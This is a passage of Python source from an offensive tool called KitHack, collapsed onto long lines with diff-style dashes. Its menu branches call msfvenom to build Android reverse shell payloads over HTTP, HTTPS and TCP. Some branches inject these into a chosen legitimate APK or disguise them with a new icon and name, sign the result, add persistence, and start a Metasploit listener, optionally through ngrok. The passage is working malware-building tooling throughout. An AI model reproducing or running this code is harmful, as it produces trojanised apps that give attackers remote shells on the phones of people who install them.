time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_http LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_http LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("{}\n[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif pay == '06': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_https LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_https LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("{}\n[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] INVALID OPTION\n".format(RED)) - time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') - main() - - elif pay == '07': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) - time.sleep(3) - 